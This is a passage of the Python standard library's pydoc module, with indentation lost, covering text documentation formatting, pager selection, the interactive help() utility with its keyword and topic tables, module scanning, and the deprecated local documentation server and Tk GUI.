if callable(value) or inspect.isdatadescriptor(value):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, maxlen=70, doc=doc) + '\n')
return attrs
attrs = [(name, kind, cls, value)
for name, kind, cls, value in classify_class_attrs(object)
if visiblename(name, obj=object)]
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is builtins.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(contents.rstrip(), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.__self__.__class__
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.__self__ is not None:
note = ' method of %s instance' % classname(
object.__self__.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.__func__
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults, kwonlyargs, kwdefaults, ann = \
inspect.getfullargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, kwonlyargs, kwdefaults, ann,
formatvalue=self.formatvalue,
formatannotation=inspect.formatannotationrelativeto(object))
if realname == '<lambda>':
title = self.bold(name) + ' lambda '
# XXX lambda's won't usually have func_annotations['return']
# since the syntax doesn't support but it is possible.
# So removing parentheses isn't truly safe.
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and self.indent(doc).rstrip() + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docdescriptor(name, object, mod)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
class _PlainTextDoc(TextDoc):
"""Subclass of TextDoc which overrides string styling"""
def bold(self, text):
return text
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
pager = getpager()
pager(text)
def getpager():
"""Decide what method to use for paging through text."""
if not hasattr(sys.stdout, "isatty"):
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
elif os.environ.get('TERM') in ('dumb', 'emacs'):
return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
if os.environ.get('TERM') in ('dumb', 'emacs'):
return plainpager
if sys.platform == 'win32' or sys.platform.startswith('os2'):
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(text)
pipe.close()
except IOError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
file = open(filename, 'w')
file.write(text)
file.close()
try:
os.system(cmd + ' "' + filename + '"')
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = plain(text).split('\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
try:
r = inc = os.environ.get('LINES', 25) - 1
sys.stdout.write('\n'.join(lines[:inc]) + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ('q', 'Q'):
sys.stdout.write('\r \r')
break
elif c in ('\r', '\n'):
sys.stdout.write('\r \r' + lines[r] + '\n')
r = r + 1
continue
if c in ('b', 'B', '\x1b'):
r = r - inc - inc
if r < 0: r = 0
sys.stdout.write('\n' + '\n'.join(lines[r:r+inc]) + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(plain(text))
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isgetsetdescriptor(thing):
return 'getset descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.ismemberdescriptor(thing):
return 'member descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
return type(thing).__name__
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in path.split('.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport('.'.join(parts[:n+1]), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
else:
object = builtins
for part in parts[n:]:
try:
object = getattr(object, part)
except AttributeError:
return None
return object
# --------------------------------------- interactive interpreter interface
text = TextDoc()
plaintext = _PlainTextDoc()
html = HTMLDoc()
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if not object:
raise ImportError('no Python documentation found for %r' % thing)
return object, thing
else:
name = getattr(thing, '__name__', None)
return thing, name if isinstance(name, str) else None
def render_doc(thing, title='Python Library Documentation: %s', forceload=0,
renderer=None):
"""Render text documentation, given an object or a path to an object."""
if renderer is None:
renderer = text
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
inspect.isgetsetdescriptor(object) or
inspect.ismemberdescriptor(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
return title % desc + '\n\n' + renderer.document(object, name)
def doc(thing, title='Python Library Documentation: %s', forceload=0,
output=None):
"""Display text documentation, given an object or a path to an object."""
try:
if output is None:
pager(render_doc(thing, title, forceload))
else:
output.write(render_doc(thing, title, forceload, plaintext))
except (ImportError, ErrorDuringImport) as value:
print(value)
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w', encoding='utf-8')
file.write(page)
file.close()
print('wrote', name + '.html')
except (ImportError, ErrorDuringImport) as value:
print(value)
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
writedoc(modname)
return
class Helper:
# These dictionaries map a topic name to either an alias, or a tuple
# (label, seealso-items). The "label" is the label of the corresponding
# section in the .rst file under Doc/ and an index into the dictionary
# in pydoc_data/topics.py.
#
# CAUTION: if you change one of these dictionaries, be sure to adapt the
# list of needed labels in Doc/tools/sphinxext/pyspecific.py and
# regenerate the pydoc_data/topics.py file by running
# make pydoc-topics
# in Doc/ and copying the output file into the Lib/ directory.
keywords = {
'False': '',
'None': '',
'True': '',
'and': 'BOOLEAN',
'as': 'with',
'assert': ('assert', ''),
'break': ('break', 'while for'),
'class': ('class', 'CLASSES SPECIALMETHODS'),
'continue': ('continue', 'while for'),
'def': ('function', ''),
'del': ('del', 'BASICMETHODS'),
'elif': 'if',
'else': ('else', 'while for'),
'except': 'try',
'finally': 'try',
'for': ('for', 'break continue while'),
'from': 'import',
'global': ('global', 'nonlocal NAMESPACES'),
'if': ('if', 'TRUTHVALUE'),
'import': ('import', 'MODULES'),
'in': ('in', 'SEQUENCEMETHODS'),
'is': 'COMPARISON',
'lambda': ('lambda', 'FUNCTIONS'),
'nonlocal': ('nonlocal', 'global NAMESPACES'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('pass', ''),
'raise': ('raise', 'EXCEPTIONS'),
'return': ('return', 'FUNCTIONS'),
'try': ('try', 'EXCEPTIONS'),
'while': ('while', 'break continue if TRUTHVALUE'),
'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('yield', ''),
}
# Either add symbols to this dictionary or to the symbols dictionary
# directly: Whichever is easier. They are merged later.
_symbols_inverse = {
'STRINGS' : ("'", "'''", "r'", "b'", '"""', '"', 'r"', 'b"'),
'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
'|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'),
'UNARY' : ('-', '~'),
'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
'^=', '<<=', '>>=', '**=', '//='),
'BITWISE' : ('<<', '>>', '&', '|', '^', '~'),
'COMPLEX' : ('j', 'J')
}
symbols = {
'%': 'OPERATORS FORMATTING',
'**': 'POWER',
',': 'TUPLES LISTS FUNCTIONS',
'.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
'...': 'ELLIPSIS',
':': 'SLICINGS DICTIONARYLITERALS',
'@': 'def class',
'\\': 'STRINGS',
'_': 'PRIVATENAMES',
'__': 'PRIVATENAMES SPECIALMETHODS',
'`': 'BACKQUOTES',
'(': 'TUPLES FUNCTIONS CALLS',
')': 'TUPLES FUNCTIONS CALLS',
'[': 'LISTS SUBSCRIPTS SLICINGS',
']': 'LISTS SUBSCRIPTS SLICINGS'
}
for topic, symbols_ in _symbols_inverse.items():
for symbol in symbols_:
topics = symbols.get(symbol, topic)
if topic not in topics:
topics = topics + ' ' + topic
symbols[symbol] = topics
topics = {
'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
'FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('formatstrings', 'OPERATORS'),
'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('integers', 'int range'),
'FLOAT': ('floating', 'float math'),
'COMPLEX': ('imaginary', 'complex cmath'),
'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING range LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('typesfunctions', 'def TYPES'),
'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('bltin-null-object', ''),
'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('specialattrs', ''),
'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
'LISTS DICTIONARIES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('objects', 'TYPES'),
'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
'CALLABLEMETHODS SEQUENCEMETHODS MAPPINGMETHODS '
'NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('customization', 'hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS '
'SPECIALMETHODS'),
'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
'SPECIALMETHODS'),
'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('naming', 'global nonlocal ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('exceptions', 'try except finally raise'),
'CONVERSIONS': ('conversions', ''),
'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('id-classes', ''),
'PRIVATENAMES': ('atom-identifiers', ''),
'LITERALS': ('atom-literals', 'STRINGS NUMBERS TUPLELITERALS '
'LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('lists', 'LISTS LITERALS'),
'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS'),
'SLICINGS': ('slicings', 'SEQUENCEMETHODS'),
'CALLS': ('calls', 'EXPRESSIONS'),
'POWER': ('power', 'EXPRESSIONS'),
'UNARY': ('unary', 'EXPRESSIONS'),
'BINARY': ('binary', 'EXPRESSIONS'),
'SHIFTING': ('shifting', 'EXPRESSIONS'),
'BITWISE': ('bitwise', 'EXPRESSIONS'),
'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('compound', 'for while break continue'),
'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('debugger', 'pdb'),
'CONTEXTMANAGERS': ('context-managers', 'with'),
}
def __init__(self, input=None, output=None):
self._input = input
self._output = output
input = property(lambda self: self._input or sys.stdin)
output = property(lambda self: self._output or sys.stdout)
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
_GoInteractive = object()
def __call__(self, request=_GoInteractive):
if request is not self._GoInteractive:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = replace(request, '"', '', "'", '').strip()
if request.lower() in ('q', 'quit'): break
self.help(request)
def getline(self, prompt):
"""Read one line, using input() when appropriate."""
if self.input is sys.stdin:
return input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
if type(request) is type(''):
request = request.strip()
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'symbols': self.listsymbols()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(request.split()[1])
elif request in self.symbols: self.showsymbol(request)
elif request in ['True', 'False', 'None']:
# special case these keywords since they are objects too
doc(eval(request), 'Help on %s:')
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:', output=self._output)
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:', output=self._output)
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/%s/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % tuple([sys.version[:3]]*2))
def list(self, items, columns=4, width=80):
items = list(sorted(items))
colw = width // columns
rows = (len(items) + columns - 1) // columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw - 1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listsymbols(self):
self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
self.list(self.symbols.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic, more_xrefs=''):
try:
import pydoc_data.topics
except ImportError:
self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target, more_xrefs)
label, xrefs = target
try:
doc = pydoc_data.topics.topics[label]
except KeyError:
self.output.write('no documentation found for %s\n' % repr(topic))
return
pager(doc.strip() + '\n')
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
if xrefs:
import formatter
buffer = io.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + ', '.join(xrefs.split()) + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def _gettopic(self, topic, more_xrefs=''):
"""Return unbuffered tuple of (topic, xrefs).
If an error occurs here, the exception is caught and displayed by
the url handler.
This function duplicates the showtopic method but returns its
result directly so it can be formatted for display in an html page.
"""
try:
import pydoc_data.topics
except ImportError:
return('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''' , '')
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
raise ValueError('could not find topic')
if isinstance(target, str):
return self._gettopic(target, more_xrefs)
label, xrefs = target
doc = pydoc_data.topics.topics[label]
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
return doc, xrefs
def showsymbol(self, symbol):
target = self.symbols[symbol]
topic, _, xrefs = target.partition(' ')
self.showtopic(topic, xrefs)
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if modname.find('.') < 0:
modules[modname] = 1
def onerror(modname):
callback(None, modname, None)
ModuleScanner().run(callback, onerror=onerror)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper()
class Scanner:
"""A generic tree iterator."""
def __init__(self, roots, children, descendp):
self.roots = roots[:]
self.state = []
self.children = children
self.descendp = descendp
def next(self):
if not self.state:
if not self.roots:
return None
root = self.roots.pop(0)
self.state = [(root, self.children(root))]
node, children = self.state[-1]
if not children:
self.state.pop()
return self.next()
child = children.pop(0)
if self.descendp(child):
self.state.append((child, self.children(child)))
return child
class ModuleScanner:
"""An interruptible scanner that searches module synopses."""
def run(self, callback, key=None, completer=None, onerror=None):
if key: key = key.lower()
self.quit = False
seen = {}
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
name = __import__(modname).__doc__ or ''
desc = name.split('\n')[0]
name = modname + ' - ' + desc
if name.lower().find(key) >= 0:
callback(None, modname, desc)
for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
if self.quit:
break
# XXX Skipping this file is a workaround for a bug
# that causes python to crash with a segfault.
# http://bugs.python.org/issue9319
#
# TODO Remove this once the bug is fixed.
if modname in {'test.badsyntax_pep3120', 'badsyntax_pep3120'}:
continue
if key is None:
callback(None, modname, '')
else:
try:
loader = importer.find_module(modname)
except SyntaxError:
# raised by tests for bad coding cookies or BOM
continue
if hasattr(loader, 'get_source'):
try:
source = loader.get_source(modname)
except UnicodeDecodeError:
if onerror:
onerror(modname)
continue
desc = source_synopsis(io.StringIO(source)) or ''
if hasattr(loader, 'get_filename'):
path = loader.get_filename(modname)
else:
path = None
else:
try:
module = loader.load_module(modname)
except ImportError:
if onerror:
onerror(modname)
continue
desc = (module.__doc__ or '').splitlines()[0]
path = getattr(module,'__file__',None)
name = modname + ' - ' + desc
if name.lower().find(key) >= 0:
callback(path, modname, desc)
if completer:
completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print(modname, desc and '- ' + desc)
def onerror(modname):
pass
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key, onerror=onerror)
# --------------------------------------------------- Web browser interface
def serve(port, callback=None, completer=None):
import http.server, email.message, select
msg = 'the pydoc.serve() function is deprecated'
warnings.warn(msg, DeprecationWarning, stacklevel=2)
class DocHandler(http.server.BaseHTTPRequestHandler):
def send_document(self, title, contents):
try:
self.send_response(200)
self.send_header('Content-Type', 'text/html; charset=UTF-8')
self.end_headers()
self.wfile.write(html.page(title, contents).encode('utf-8'))
except IOError: pass
def do_GET(self):
path = self.path
if path[-5:] == '.html': path = path[:-5]
if path[:1] == '/': path = path[1:]
if path and path != '.':
try:
obj = locate(path, forceload=1)
except ErrorDuringImport as value:
self.send_document(path, html.escape(str(value)))
return
if obj:
self.send_document(describe(obj), html.document(obj, path))
else:
self.send_document(path,
'no Python documentation found for %s' % repr(path))
else:
heading = html.heading(
'<big><big><strong>Python: Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
names = [x for x in sys.builtin_module_names if x != '__main__']
contents = html.multicolumn(names, bltinlink)
indices = ['<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
indices.append(html.index(dir, seen))
contents = heading + ' '.join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee <ping@lfw.org></font>'''
self.send_document('Index of Modules', contents)
def log_message(self, *args): pass
class DocServer(http.server.HTTPServer):
def __init__(self, port, callback):
host = 'localhost'
self.address = (host, port)
self.url = 'http://%s:%d/' % (host, port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
def serve_until_quit(self):
import select
self.quit = False
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd: self.handle_request()
self.server_close()
def server_activate(self):
self.base.server_activate(self)
if self.callback: self.callback(self)
DocServer.base = http.server.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = email.message.Message
try:
try:
DocServer(port, callback).serve_until_quit()
except (KeyboardInterrupt, select.error):
pass
finally:
if completer: completer()
# ----------------------------------------------------- graphical interface
def gui():
"""Graphical interface (starts Web server and pops up a control window)."""
msg = ('the pydoc.gui() function and "pydoc -g" option are deprecated\n',
'use "pydoc.browse() function and "pydoc -b" option instead.')
warnings.warn(msg, DeprecationWarning, stacklevel=2)
class GUI:
def __init__(self, window, port=7464):
self.window = window
self.server = None
self.scanner = None
import tkinter
self.server_frm = tkinter.Frame(window)
self.title_lbl = tkinter.Label(self.server_frm,
text='Starting server...\n ')
self.open_btn = tkinter.Button(self.server_frm,
text='open browser', command=self.open, state='disabled')
self.quit_btn = tkinter.Button(self.server_frm,
text='quit serving', command=self.quit, state='disabled')
self.search_frm = tkinter.Frame(window)
self.search_lbl = tkinter.Label(self.search_frm, text='Search for')
self.search_ent = tkinter.Entry(self.search_frm)
self.search_ent.bind('<Return>', self.search)
self.stop_btn = tkinter.Button(self.search_frm,
text='stop', pady=0, command=self.stop, state='disabled')
if sys.platform == 'win32':
# Trying to hide and show this button crashes under Windows.
self.stop_btn.pack(side='right')
self.window.title('pydoc')
self.window.protocol('WM_DELETE_WINDOW', self.quit)
self.title_lbl.pack(side='top', fill='x')
self.open_btn.pack(side='left', fill='x', expand=1)
self.quit_btn.pack(side='right', fill='x', expand=1)
self.server_frm.pack(side='top', fill='x')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
self.search_frm.pack(side='top', fill='x')
self.search_ent.focus_set()
font = ('helvetica', sys.platform == 'win32' and 8 or 10)
self.result_lst = tkinter.Listbox(window, font=font, height=6)
self.result_lst.bind('<Button-1>', self.select)
self.result_lst.bind('<Double-Button-1>', self.goto)
self.result_scr = tkinter.Scrollbar(window,
orient='vertical', command=self.result_lst.yview)
self.result_lst.config(yscrollcommand=self.result_scr.set)
self.result_frm = tkinter.Frame(window)
self.goto_btn = tkinter.Button(self.result_frm,
text='go to selected', command=self.goto)
self.hide_btn = tkinter.Button(self.result_frm,
text='hide results', command=self.hide)
self.goto_btn.pack(side='left', fill='x', expand=1)
self.hide_btn.pack(side='right', fill='x', expand=1)
self.window.update()
self.minwidth = self.window.winfo_width()
self.minheight = self.window.winfo_height()
self.bigminheight = (self.server_frm.winfo_reqheight() +
self.search_frm.winfo_reqheight() +
self.result_lst.winfo_reqheight() +
self.result_frm.winfo_reqheight())
self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
self.expanded = 0
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.window.tk.willdispatch()
import threading
threading.Thread(
target=serve, args=(port, self.ready, self.quit)).start()
def ready(self, server):
self.server = server
self.title_lbl.config(
text='Python documentation server at\n' + server.url)
self.open_btn.config(state='normal')
self.quit_btn.config(state='normal')
def open(self, event=None, url=None):
url = url or self.server.url
import webbrowser
webbrowser.open(url)
def quit(self, event=None):
if self.server:
self.server.quit = 1
self.window.quit()
def search(self, event=None):
key = self.search_ent.get()
self.stop_btn.pack(side='right')
self.stop_btn.config(state='normal')
self.search_lbl.config(text='Searching for "%s"...' % key)
self.search_ent.forget()
self.search_lbl.pack(side='left')
self.result_lst.delete(0, 'end')
self.goto_btn.config(state='disabled')
self.expand()
import threading
if self.scanner:
self.scanner.quit = 1
self.scanner = ModuleScanner()
threading.Thread(target=self.scanner.run,
args=(self.update, key, self.done)).start()
def update(self, path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
self.result_lst.insert('end',
modname + ' - ' + (desc or '(no description)'))
def stop(self, event=None):
if self.scanner:
self.scanner.quit = 1
self.scanner = None
def done(self):
self.scanner = None
self.search_lbl.config(text='Search for')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
if sys.platform != 'win32': self.stop_btn.forget()
self.stop_btn.config(state='disabled')
def select(self, event=None):
self.goto_btn.config(state='normal')
def goto(self, event=None):
